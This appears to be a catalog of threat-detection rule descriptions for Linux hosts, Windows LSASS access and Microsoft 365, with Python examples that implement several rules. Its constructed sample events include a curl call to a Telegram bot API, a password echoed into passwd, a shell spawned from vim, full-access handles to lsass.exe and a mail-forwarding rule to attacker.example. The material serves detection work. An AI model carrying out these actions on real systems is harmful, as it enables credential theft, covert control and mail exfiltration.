Linux Restricted Shell Breakout via Linux Binary(s)
Identifies the abuse of a Linux binary to break out of a restricted shell or environment by spawning an interactive system shell. Spawning a shell from such a binary is not common behavior for a user or system administrator and may indicate an attempt to evade detection, gain capabilities, or make the adversary's access more stable.
Linux SSH X11 Forwarding
This rule monitors for X11 forwarding via SSH. X11 forwarding is a feature that allows users to run graphical applications on a remote server and display the application's graphical user interface on their local machine. Attackers can abuse X11 forwarding for tunneling their GUI-based tools, pivot through compromised systems, and create covert communication channels, enabling lateral movement and facilitating remote control of systems within a network.
Linux Telegram API Request
This rule detects when a process executes the curl or wget command with an argument that includes the api.telegram.org domain. This may indicate command and control behavior.
Linux User Account Creation
Identifies attempts to create new users. Attackers may add new users to establish persistence on a system.
Linux User Account Credential Modification
This rule detects Linux user account credential modification events in which the echo command is used to pipe a password directly into the passwd utility or another password-setting tool from the shadow suite. Malware uses this technique to automate changing account credentials on Linux systems after infection.
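The three Linux process-based rules above (restricted shell breakout, Telegram API request, and echo-into-passwd credential modification) all reduce to checks on a process event's name, arguments and parent. The following is an added example, not the detection catalog's own rule logic: it implements each check as a function over a constructed process-event schema and runs them against constructed sample events. The set of shell-spawning binaries is an illustrative subset, and the field names are assumptions.

```python
"""Added example: three Linux process-event detections over a constructed event schema."""
from dataclasses import dataclass, field
from typing import Callable, List, Optional, Tuple

# Interactive shells an adversary ends up in after a breakout.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "fish"}
# Illustrative subset of binaries able to spawn a shell (assumption: the real
# rule's list is longer and maintained alongside the rule).
SHELL_SPAWNERS = {"vim", "vi", "find", "awk", "gawk", "less", "more", "man",
                  "python3", "perl", "ruby", "nmap", "expect", "env"}


@dataclass
class ProcessEvent:
    """Constructed schema: one process-start event with parent context."""
    name: str
    args: List[str]
    parent_name: str
    parent_args: List[str] = field(default_factory=list)
    user: str = "root"


def detect_restricted_shell_breakout(ev: ProcessEvent) -> Optional[str]:
    """Linux Restricted Shell Breakout: a shell whose parent is a known spawner binary."""
    if ev.name in SHELLS and ev.parent_name in SHELL_SPAWNERS:
        return f"shell {ev.name} spawned from {ev.parent_name}"
    return None


def detect_telegram_api_request(ev: ProcessEvent) -> Optional[str]:
    """Linux Telegram API Request: curl or wget with api.telegram.org in its arguments."""
    if ev.name in {"curl", "wget"} and any("api.telegram.org" in a for a in ev.args):
        return "curl/wget contacting api.telegram.org"
    return None


def detect_credential_modification(ev: ProcessEvent) -> Optional[str]:
    """Linux User Account Credential Modification: a password echoed into passwd/chpasswd.

    The pipe only appears in the parent shell's command line (sh -c "echo ... | passwd"),
    so the check is on the parent's arguments, not on passwd's own.
    """
    parent_cmd = " ".join(ev.parent_args)
    if ev.name in {"passwd", "chpasswd"} and "echo" in parent_cmd and "|" in parent_cmd:
        return f"echo piped into {ev.name}"
    return None


RULES: Tuple[Callable[[ProcessEvent], Optional[str]], ...] = (
    detect_restricted_shell_breakout,
    detect_telegram_api_request,
    detect_credential_modification,
)


def triage(events: List[ProcessEvent]) -> List[Tuple[str, str]]:
    """Run every rule over every event; return (rule name, reason) for each hit."""
    hits = []
    for ev in events:
        for rule in RULES:
            reason = rule(ev)
            if reason:
                hits.append((rule.__name__, reason))
    return hits


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    ProcessEvent("bash", ["bash"], parent_name="vim"),            # :!bash typed inside vim
    ProcessEvent("curl", ["curl", "-s", "https://api.telegram.org/botTOKEN/sendMessage"],
                 parent_name="bash"),
    ProcessEvent("passwd", ["passwd", "--stdin", "svc"], parent_name="sh",
                 parent_args=["sh", "-c", "echo Passw0rd | passwd --stdin svc"]),
    ProcessEvent("bash", ["bash"], parent_name="sshd"),           # benign interactive login
    ProcessEvent("curl", ["curl", "https://example.org"], parent_name="bash"),  # benign fetch
]

if __name__ == "__main__":
    for rule_name, reason in triage(SAMPLE_EVENTS):
        print(f"{rule_name}: {reason}")
```

The two benign events exercise the negative path: a login shell under sshd and a curl to an unrelated host produce no hits, so the three alerts come only from the three constructed malicious events.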
Linux User Added to Privileged Group
Identifies attempts to add a user to a privileged group. Attackers may add users to a privileged group in order to establish persistence on a system.
Linux User or Group Deletion
This rule detects the deletion of user or group accounts on Linux systems. Adversaries may use these commands to remove accounts to cover their tracks or disrupt operations.
Linux Video Recording or Screenshot Activity Detected
This rule monitors for the usage of the most common video recording or screenshot utilities on Unix systems by an uncommon parent process. Adversaries may collect video or screenshot data from users or systems for a variety of reasons, including espionage, credential theft, or reconnaissance.
LLM-Based Attack Chain Triage by Host
This rule correlates multiple endpoint security alerts from the same host and uses an LLM to analyze command lines, parent processes, file operations, DNS queries, registry modifications, module loads and MITRE ATT&CK tactics progression to determine if they form a coherent attack chain. The LLM provides a verdict (TP/FP/SUSPICIOUS) with confidence score and summary explanation, helping analysts to prioritize hosts exhibiting corroborated malicious behavior while filtering out benign activity.
LLM-Based Compromised User Triage by User
This rule correlates multiple security alerts involving the same user across hosts and data sources, then uses an LLM to analyze whether they indicate account compromise. The LLM evaluates alert patterns, MITRE tactics progression, geographic anomalies, and multi-host activity to provide a verdict and confidence score, helping analysts prioritize users exhibiting indicators of credential theft or unauthorized access.
Loadable Kernel Module Configuration File Creation
This rule detects the creation of Loadable Kernel Module (LKM) configuration files. Attackers may create or modify these files to allow their LKMs to be loaded upon reboot, ensuring persistence on a compromised system.
Local Account TokenFilter Policy Disabled
Identifies registry modification of the LocalAccountTokenFilterPolicy value. This value does not exist by default; if it is present and set to 1, remote connections from all local members of the Administrators group are granted full high-integrity tokens during negotiation instead of the filtered tokens that UAC remote restrictions would otherwise issue.
Local Scheduled Task Creation
Indicates the creation of a scheduled task. Adversaries can use these to establish persistence, move laterally, and/or escalate privileges.
LSASS Memory Dump Creation
Identifies the creation of a Local Security Authority Subsystem Service (lsass.exe) memory dump written with a default dump file name. This may indicate a credential access attempt via trusted system utilities such as Task Manager (taskmgr.exe) and SQL Dumper (sqldumper.exe), or via known pentesting tools such as Dumpert and AndrewSpecial.
LSASS Memory Dump Handle Access
Identifies handle requests for the Local Security Authority Subsystem Service (LSASS) process object with specific access masks that many tools capable of dumping memory to disk request (0x1fffff, 0x1010, 0x120089). This rule is tool agnostic: it has been validated against a range of LSASS dump tools such as SharpDump, Procdump, Mimikatz and comsvcs.dll. It detects this behavior at a low level and does not depend on a specific tool or dump file name.
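To see why the rule matches exact masks rather than individual rights, it helps to decode the three values. The following is an added example, not the rule's own logic: it decodes a process access mask into the winnt.h right names and flags Sysmon Event ID 10-style ProcessAccess records that target lsass.exe with one of the listed masks. The record schema and the sample events are constructed.

```python
"""Added example: decode process access masks and flag LSASS handle requests."""
from typing import Dict, List, Tuple

# Process-specific rights from winnt.h, plus the standard rights the masks combine.
PROCESS_RIGHTS: Dict[int, str] = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x2000: "PROCESS_SET_LIMITED_INFORMATION",
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
    0x00100000: "SYNCHRONIZE",
}

# The masks named in the rule. 0x1FFFFF is PROCESS_ALL_ACCESS; 0x1010 is
# PROCESS_VM_READ | PROCESS_QUERY_LIMITED_INFORMATION, the minimum a reader of
# another process's memory needs; 0x120089 is numerically FILE_GENERIC_READ, so
# decoding it with the process table gives misleading names. That is why the
# detection compares whole masks instead of individual rights.
SUSPICIOUS_MASKS = {0x1FFFFF, 0x1010, 0x120089}


def decode_access_mask(mask: int) -> List[str]:
    """Return the right names set in mask, plus any bits the table does not name."""
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    known = 0
    for bit in PROCESS_RIGHTS:
        known |= bit
    leftover = mask & ~known
    if leftover:
        names.append(f"UNNAMED_{leftover:#x}")
    return names


def is_lsass_dump_handle(event: Dict[str, str]) -> bool:
    """Constructed Sysmon Event ID 10-like record: SourceImage, TargetImage, GrantedAccess (hex string)."""
    target = event.get("TargetImage", "").lower()
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    return target.endswith("\\lsass.exe") and granted in SUSPICIOUS_MASKS


def flag_events(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (SourceImage, decoded rights) for every event the rule would match."""
    return [
        (e["SourceImage"], decode_access_mask(int(e["GrantedAccess"], 16)))
        for e in events
        if is_lsass_dump_handle(e)
    ]


# Constructed sample records, not real telemetry.
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Tools\procdump64.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Windows\System32\taskmgr.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1000"},   # query-only, routine and not in the rule's set
    {"SourceImage": r"C:\Tools\procdump64.exe", "TargetImage": r"C:\Windows\System32\notepad.exe",
     "GrantedAccess": "0x1FFFFF"},  # full access, but not to LSASS
]

if __name__ == "__main__":
    for mask in sorted(SUSPICIOUS_MASKS):
        print(f"{mask:#08x}: {', '.join(decode_access_mask(mask))}")
    for source, rights in flag_events(SAMPLE_EVENTS):
        print(f"ALERT {source} -> lsass.exe with {rights}")
```

The two negative samples show the rule's boundaries: a 0x1000 query from svchost.exe is the kind of routine LSASS access that would make a looser "any handle to lsass.exe" rule unusable, and full access to a non-LSASS process is out of scope.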
LSASS Process Access via Windows API
Identifies access attempts to the LSASS handle, which may indicate an attempt to dump credentials from LSASS memory.
M365 Azure Monitor Alert Email with Financial or Billing Theme
Detects Azure Monitor alert notification emails with financial or billing themed subject lines delivered to organization users. Adversaries abuse Azure Monitor alert rules to deliver callback phishing emails from Microsoft's legitimate azure-noreply@microsoft.com address. Because the emails originate from Microsoft's own infrastructure, they pass SPF, DKIM, and DMARC checks, bypassing email security filters and increasing victim trust. The attacker embeds a fraudulent billing or security lure in the alert rule description, which is rendered in the notification email body. Observed subject patterns include invoice numbers, payment references, and order confirmations.
M365 Exchange Anti-Phish Policy Deleted
Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing policies increase this protection by refining settings to better detect and prevent attacks.
M365 Exchange Anti-Phish Rule Modification
Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks.
M365 Exchange DKIM Signing Configuration Disabled
Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed.
M365 Exchange Email Safe Attachment Rule Disabled
Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses.
M365 Exchange Email Safe Link Policy Disabled
Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user.
M365 Exchange Federated Domain Created or Modified
Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider.
M365 Exchange Inbox Forwarding Rule Created
Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges.
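In the Microsoft 365 Unified Audit Log, an Inbox rule creation appears as a New-InboxRule operation whose cmdlet parameters are recorded as a list of name/value pairs; the rule forwards mail when ForwardTo, ForwardAsAttachmentTo or RedirectTo is among them. The following is an added example, not the catalog's own rule: it parses constructed audit records, flags New-InboxRule operations carrying one of those parameters, and annotates whether the recipient domain is outside an assumed list of tenant domains. The sample records and the tenant domain are constructed.

```python
"""Added example: flag New-InboxRule audit records that forward or redirect mail."""
import json
from typing import Dict, List, Optional

# New-InboxRule parameters that send the message, or a copy of it, elsewhere.
FORWARDING_PARAMS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo")
# Assumption: the tenant's accepted domains; anything else is treated as external.
INTERNAL_DOMAINS = {"contoso.example"}


def parameters(record: Dict) -> Dict[str, str]:
    """Audit records carry cmdlet parameters as [{"Name": ..., "Value": ...}, ...]."""
    return {p["Name"]: p["Value"] for p in record.get("Parameters", [])}


def recipient_domains(value: str) -> List[str]:
    """Extract domains from 'user@domain' or Exchange-style '"Name" [SMTP:user@domain]' values."""
    cleaned = value.replace("[SMTP:", " ").replace("]", " ").replace(";", " ")
    domains = []
    for token in cleaned.split():
        if "@" in token:
            domains.append(token.strip("\"'<>").split("@", 1)[1].lower())
    return domains


def inbox_forwarding_alert(record: Dict) -> Optional[str]:
    """Return an alert string for a New-InboxRule that forwards or redirects, else None."""
    if record.get("Operation") != "New-InboxRule":
        return None
    params = parameters(record)
    targets = [(name, params[name]) for name in FORWARDING_PARAMS if name in params]
    if not targets:
        return None
    external = [d for _, value in targets for d in recipient_domains(value)
                if d not in INTERNAL_DOMAINS]
    scope = "external" if external else "internal"
    rule_name = params.get("Name", "?")
    return f"{record['UserId']} created rule {rule_name!r} forwarding {scope}: {targets}"


def scan(lines: List[str]) -> List[str]:
    """Run the check over newline-delimited JSON audit records."""
    alerts = []
    for line in lines:
        if line.strip():
            alert = inbox_forwarding_alert(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts


# Constructed audit records (not real tenant data). Note the one-character rule
# name in the first record, a common trick to keep the rule inconspicuous.
SAMPLE_AUDIT_LOG = """
{"Operation": "New-InboxRule", "UserId": "alice@contoso.example", "Parameters": [{"Name": "Name", "Value": "."}, {"Name": "ForwardTo", "Value": "collector@attacker.example"}, {"Name": "DeleteMessage", "Value": "True"}]}
{"Operation": "New-InboxRule", "UserId": "bob@contoso.example", "Parameters": [{"Name": "Name", "Value": "Team"}, {"Name": "MoveToFolder", "Value": "Archive"}]}
{"Operation": "Set-Mailbox", "UserId": "carol@contoso.example", "Parameters": [{"Name": "ForwardingSmtpAddress", "Value": "smtp:carol@contoso.example"}]}
{"Operation": "New-InboxRule", "UserId": "dave@contoso.example", "Parameters": [{"Name": "Name", "Value": "Delegate"}, {"Name": "RedirectTo", "Value": "\\"Erin\\" [SMTP:erin@contoso.example]"}]}
""".strip().splitlines()

if __name__ == "__main__":
    for alert in scan(SAMPLE_AUDIT_LOG):
        print(alert)
```

Bob's rule only moves mail to a folder and Carol's change is a mailbox-level forward set through Set-Mailbox rather than an Inbox rule, so neither matches; Dave's redirect to a tenant address is reported but marked internal, which is the kind of case a triage queue would down-rank rather than drop.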